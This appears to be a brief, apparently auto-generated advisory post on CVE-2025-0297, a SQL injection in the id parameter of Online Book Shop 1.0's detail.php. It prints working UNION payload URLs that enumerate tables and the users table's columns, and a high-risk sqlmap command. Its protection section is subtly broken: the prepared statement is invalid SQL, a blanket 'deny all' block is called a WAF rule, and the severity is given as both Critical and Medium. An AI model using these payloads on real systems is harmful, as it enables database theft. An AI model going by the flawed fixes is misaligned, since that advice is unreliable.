Online Book Shop 10, SQL Injection, CVE-2025-0297 (Critical)

The CVE-2025-0297 vulnerability in Online Book Shop 1.0 allows remote attackers to execute arbitrary SQL queries via the `id` parameter in /detail.php. This occurs due to improper sanitization of user-supplied input, enabling SQL injection. Attackers can manipulate database queries by injecting malicious SQL payloads, potentially leading to unauthorized data access, modification, or deletion. The vulnerability is exploitable without authentication, making it critical.

DailyCVE Form:

Platform: Online Book Shop
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/16/2025

What Undercode Say:

Exploitation:

1. Payload Example:

http://example.com/detail.php?id=1' UNION SELECT 1,2,3,4,5-- -

2. Database Enumeration:

http://example.com/detail.php?id=1' UNION SELECT 1,table_name,3,4,5 FROM information_schema.tables-- -

3. Data Extraction:

http://example.com/detail.php?id=1' UNION SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name='users'-- -

Protection:

1. Input Validation:

$id = mysqli_real_escape_string($conn, $_GET['id']);

2. Prepared Statements:

$stmt = $conn->prepare("SELECT FROM books WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);

3. WAF Rules:

location ~ /detail.php {
deny all;
}

Analytics:

• CVSS: 5.3 (Medium)
• Attack Vector: Network
• Impact: Data Confidentiality, Integrity

Detection:

1. SQLi Scanning:

sqlmap -u "http://example.com/detail.php?id=1" --risk=3 --level=5

2. Log Monitoring:

grep "UNION|SELECT" /var/log/apache2/access.log

Mitigation:

• Patch `/detail.php` to sanitize inputs.
• Disable error reporting in production.
• Implement rate limiting.

(End of Report)

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram